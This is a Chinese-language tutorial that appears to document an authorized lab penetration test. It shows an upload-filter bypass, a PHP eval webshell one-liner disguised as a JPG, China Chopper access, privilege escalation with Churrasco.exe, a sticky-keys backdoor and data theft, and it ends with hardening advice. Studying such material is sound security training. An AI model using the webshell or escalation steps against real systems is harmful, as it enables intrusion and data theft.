一次图文并茂的渗透完整测试

任务:某公司授权你对其服务器进行攻击渗透。对某核心服务器进行入侵测试,据了解,该web服务器ip地址(10.1.1.178)存在敏感数据。
      1、利用网站漏洞获取该服务器shell
      2、新建一用户并将权限提升至管理员
      3、获得服务器上的关键敏感数据(C:\console)内。
此文只作为学习
一次图文并茂的渗透完整测试_第1张图片
渗透流程
1、探测信息
2、利用漏洞得到管理账号密码
3、找到后台
4、登录后台取得web权限
如果发现直接有上传漏洞就可以利用


1.找到上传漏洞
首先知道ip地址后打开网页访问找到站内上传点
一次图文并茂的渗透完整测试_第2张图片
一次图文并茂的渗透完整测试_第3张图片一次图文并茂的渗透完整测试_第4张图片
上传小马文件报错,只能上传图像文件,只能进行抓包
先进行代理设置
一次图文并茂的渗透完整测试_第5张图片
2.代理设置


谷歌插件Proxy SwitchySharp进行代理设置,然后开启burpsuite抓包这里就不做介绍了
软件教学可以百度去学习代理端口要一样
一次图文并茂的渗透完整测试_第6张图片

3.抓包分析,并改包上传
开始抓包
一次图文并茂的渗透完整测试_第7张图片
help.jpg内容
eval($_POST['hao']); 
?>
一次图文并茂的渗透完整测试_第8张图片
修改重新上传,上传成功。
一次图文并茂的渗透完整测试_第9张图片

4.获取webshell权限
上述的http就是小马地址,打开中国菜刀输入
一次图文并茂的渗透完整测试_第10张图片
获取webshell

一次图文并茂的渗透完整测试_第11张图片
5.提升管理权限
新建一用户并将权限提升至管理员
用cmd命令获取管理员权限
一次图文并茂的渗透完整测试_第12张图片
添加一个用户hao然后让他加入管理员组可是失败了,没办法只能在此使用工具提权
一次图文并茂的渗透完整测试_第13张图片
一次图文并茂的渗透完整测试_第14张图片

上传脚本,然后重命名,并把php脚本复制到刚才脚本里重新命名后缀php
一次图文并茂的渗透完整测试_第15张图片
在网站提权中我们经常会使用到这些工具Churrasco.exe (巴西烤肉) 
如果说webshell不能执行cmd那么我们就需要上传一个cmd
如果说上传cmd后不能添加用户那么我我们就需要上传软件提权
一次图文并茂的渗透完整测试_第16张图片
设置终端路径

提权不成功没有administrators组
一次图文并茂的渗透完整测试_第17张图片
进入远程桌面登陆界面  按shift5次得到cmd whoami /all
一次图文并茂的渗透完整测试_第18张图片
我们找到useras这个组加入进去就ok了
一次图文并茂的渗透完整测试_第19张图片
一次图文并茂的渗透完整测试_第20张图片
一次图文并茂的渗透结束了。拷贝敏感数据就可以了,让大家觉得渗透不在神秘,其实更高层次的技术也在研究中,下次带来sqlmap 注入实践教程。

6.安全建议:从上述渗透测试中发现该服务器
1.及时修补系统中的安全漏洞
2.细化服务器文件目录权限,杜绝权限漏洞
3.对于上传权限,可以通过修改服务器的配置来实现对这个漏洞的预防。很多网站都允许用户上传一定数量的图片、Flash 等,很多时候网站开发人员为了日后管理方便,对上传的文件都统一放到指定的一个文件夹里面,管理员只要对该文件夹的执行权限设置成“无”,这样一定程度可以对漏洞进行预防。

你可能感兴趣的:(安全)